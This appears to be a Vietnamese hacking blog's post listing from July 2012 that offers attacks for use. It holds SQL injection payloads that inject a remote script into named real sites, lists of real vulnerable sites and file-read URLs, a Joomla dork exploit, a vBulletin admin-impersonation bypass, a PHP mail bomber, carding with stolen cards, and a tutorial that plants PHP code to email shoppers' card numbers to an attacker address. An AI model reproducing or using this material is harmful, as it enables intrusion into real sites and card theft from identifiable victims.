27 thg 7, 2012

Tutorial Tạo Hiệu Ứng Hacker Tung Chảo Với CMD

Tutorial Tạo Hiệu Ứng Hacker Tung Chảo Với CMD


Xem chi tiết »
0
Nhãn:
no image

Joomla [ Sql Injection Vunerability ]

################################################## #######################

[+] Exploit Title : Joomla [ Sql Injection Vunerability ]
[~] Author : Ne0 H4ck3R
[~] Contact : backtrack1337@hotmail.com
[~] Date : 03-08-2011
[~] HomePage : www.indishell.in
[~] Dork : inurl"com_xeslidegalfx"
[~] Tested on: Joomla 1.5.x
[~] Vendor : http://art-kabbalah.net/component/xeslidegalfx/
[~] Vulnerability Style : com_xeslidegalfx [ Sql Injection Vunerability ]

################################################## #######################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Greetz T0: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, DarkL00k, Th3 RDX, G00g!3 W@rr!0r,
eXeSoul, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor, dodo , darkw0lf, ethical n00b, r00t deviL
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Vulnerability :-

~ SQL injection Vulnerability ~


[#] http://targetsite/[path]/index.php?option=com_xeslidegalfx&Itemid=&func=det ail&id=1

[#] http://targetsite/[path]/index.php?option=com_xeslidegalfx&Itemid=&func=det ail&id= [ your skill ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


=> c0d3 for motherland, h4ck for motherland



Enj0y!


[#] DOne now time to rock \m/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#
Xem chi tiết »
0
Nhãn:
no image

[TUT] Bug mấy site khựa trên sever windows lỗi WebDAV

có vẻ hơi cũ nhỉ
Tìm site khựa lỗi WebDav bug thử nhé

Download tool: http://www.mediafire.com/?1zopzz113jbba93

VIDEO HD:


http://www.youtube.com/watch?v=ESyF_RPR9vI&feature=youtu.be

Leech from VNW
Xem chi tiết »
0
Nhãn: ,

26 thg 7, 2012

no image

TUT Reg Domain = CCN

Nguyên Liệu : CCN Đủ BL
Mail
Sock Trùng Stale

Nạn Nhân
http://namebargain.com/domain-regist.../default.aspx? Xem chi tiết »
0
Nhãn: ,

25 thg 7, 2012

no image

Tools Bom Mail PHP

Đã kiểm tra chuẩn 100% inbox trên email , gmail, hotmail,
Bạn nào chưa tin thì cứ để lại mail mình bom thử
Demo:
http://kyuc1010.pro/bom.php

Linkdownload: http://www.mediafire.com/?tn7w7jh2xhunft3 Xem chi tiết »
0
Nhãn:
Code Auto SQL Injection (Update)

Code Auto SQL Injection (Update)

I- JS Khai thác sqli



 

Download Code: 
http://www.mediafire.com/?457p1u9c9uv7cw7
pass: VNH

-úp file js lên hosting.
-sử link js trong sript sau:
          <script src='http://link.com/sqli.js'></script>
       VD:

<script src='http://thptquangha.com/sqli.js'></script>

-sau đó convert đoạn sript trên sang hex.
- ta được :
3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e


- dùng nó trong thẻ sau: 


concat((0x mã hex))volcano

VD:
concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e))volcano

- đã xong. giờ ví dụ bạn đang khai thác 1 site bị sqli.
đã tìm được số lỗi. bạn chỉ việc chèn đoạn trên vào 1 trong các số lỗi đó. tiếp theo bạn tự tìm hiểu .
( cái này không hẳn site nào cũng khai thác được ).

-VD với js trên :
http://kemlam.com/?content=detail&proID=-10+union+select+1,2,3,concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e))volcano,5,6,7,8,9,10,11,12,13

=======================================


II- Hoặc 1 js khác : cái này dễ nhìn hơn cái trên ;))



download: http://www.mediafire.com/?o9gvag0gl4ggc8d

http://kemlam.com/?content=detail&proID=-10+union+select+1,2,3,concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c69322e6a73273e3c2f7363726970743e))volcano,5,6,7,8,9,10,11,12,13
 Xem chi tiết »
0
Nhãn: ,

24 thg 7, 2012

no image

Đọc Mọi File Không Cần Shell

key này do lỗi nên 1 số site không đễ ý
key:
download.php?file=
down.php?filename=
down.php?file_name=
download.php?src=
download.php?f=
...
down tưng file 1 về dọc config lấy thống tiin user+pass localhost vào phpMyAdmin chiếm admin up shell

1 Số VD

Mã:
http://www.vpv.vn/download.php?file=
http://www.mcc.edu.vn/download.php?file=../../home.php
http://nobleromancoins.com/down.php?file=
http://www.lelon.com/down.php?f=index.php&n=index.php  
http://www.homeopathyphysician.com/down.php?file=../index.php
http://www.meta-biomed.com/english/e-notice/down.php?Code=e_data&File=../index.php&FileName=index.php
http://www.vienthong360.com/component/download/down.php?filename=../index.php
http://www.jnszjy.net/down.php?file=../index.php&sort=zzgg&realfilename=index.php
http://dhanvantaricollege.org/down.php?file=../index.php 
http://sciencedvine.org/down.php?filename=../index.php
http://www.chinare.gov.cn/table/down.php?file=
http://www.ykjtj.gov.cn/admin/xxgk/down.php?file_name=../../index.php
http://www.elija.org/download.php?src=../mysql_connect.php
http://www.mnda.gov.ng/download.php?f=mndaCmsPanel/classes/DatabaseManager..php
__________________

 Xem chi tiết »
0
Nhãn: , ,

23 thg 7, 2012

vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability

vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability


===============================================================
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
===============================================================


   010101010101010101010101010101010101010101010101010101010  
   0                                                       0
   1  Iranian Datacoders Security Team 2010                1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
  

# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010                           
# Author: Immortal Boy                    
# Software Link: http://www.vbulletin.org
# Version: 3.8.4 & 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
  
#  BUG :  #########################################################################
  
1 > Go to Http://[localhost]/path/register.php

2 > Assume that forum admin user name is ADMIN

3 > Type this at User Name ===> ADMIN&#00

4 > &#00 is an ASCII Code

5 > And complete the other parameters

6 > Then click on Complete Registrarion

7 > Now you see that your user name like admin user name
  
After this time the private messages to the user (ADMIN) to sending see for you is sending .


#  Patch :  #######################################################################

1 > Go to AdminCP

2 > Click on vBulletin Options and choose vBulletin Options

3 > Choose Censorship Options

4 > type &# in Censored Words section

5 > Then click on Save

#############################################################################

Our Website : http://www.datacoders.ir
  
Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,

hosinn , NIK , uones , mohammad_ir &  all iranian datacoders members Xem chi tiết »
0
Nhãn: , ,
no image

List site lỗi SQL có creditcard

http://www.ga-k9.com/customer_testimonials.php?testimonial_id=10
 http://collards.co.za/customer_testimonials.php?'&testimonial_id=14
 http://www.healthbeyond2000.co.nz/shop/customer_testimonials.php?testimonial_id=1
 http://www.gocookie.com/customer_testimonials.php?testimonial_id=7
 http://www.ga-k9.com/customer_testimonials.php?testimonial_id=10
 http://collards.co.za/customer_testimonials.php?'&testimonial_id=14
 http://www.healthbeyond2000.co.nz/shop/customer_testimonials.php?testimonial_id=1
 http://www.gocookie.com/customer_testimonials.php?testimonial_id=7
 http://www.supermagnetman.net/customer_testimonials.php?testimonial_id=3
 http://www.elementcable.com/catalog/customer_testimonials.php?testimonial_id=67
 http://www.gocookie.com/customer_testimonials.php?testimonial_id=5
 http://www.multigyn.com/customer_testimonials.php?testimonial_id=4
 http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk
 http://www.4ushops.co.nz/customer_testimonials.php?testimonial_id=31
 http://supercheappc.co.nz/site/customer_testimonials.php?testimonial_id=4
 http://www.falseeyelashesstore.com/customer_testimonials.php?'&testimonial_id=8'&osCsid=85ed4052623c4d75a19ed7ab462c1904
 http://supercheappc.co.nz/site/customer_testimonials.php?testimonial_id=17
 http://www.supermagnetman.net/customer_testimonials.php?testimonial_id=2
 http://reflectionsofhonor.com/catalog/customer_testimonials.php?testimonial_id=9
 http://www.dollsupply.com/shop/customer_testimonials.php?testimonial_id=13
 http://www.4ushops.co.nz/customer_testimonials.php?testimonial_id=19
 http://www.autographdealer.com/customer_testimonials.php?testimonial_id=5
 http://www.gpsparatodos.com/customer_testimonials.php?testimonial_id=43'&'&testimonial_id=71'&osCsid=8fad3764b48dff9bf101e46caecbb508
 http://www.autographdealer.com/customer_testimonials.php?testimonial_id=5
 http://www.boardsandbits.com/product_info.php?products_id=13977 Xem chi tiết »
0
Nhãn:
no image

TUT Hack CC

allinurl: /sub.php?Page=1
chuyển về dạng
http://abc.com/detail.php?pid=....
hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được

get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)

link admin
http://abc.com/admin_login.php

http://abc.com/cp
vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích

tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php

vào shell tìm file đó

sau đó tìm đoạn này

<? echo

"" . substr($card_no,-4) . "<br>" .

$ex_month . "/" . $ex_year . "<br>" .

$cid;

?>
thường thì code gốc là hiện 4 số cuối của cc

sửa số màu đỏ thành số 0

sau đó gán thêm hàm này vào phía dưới
<?

$to = 'tmtno1@vnhack.us';

$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .

'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);

?>
notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%

có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất

Xem chi tiết »
0
Nhãn: ,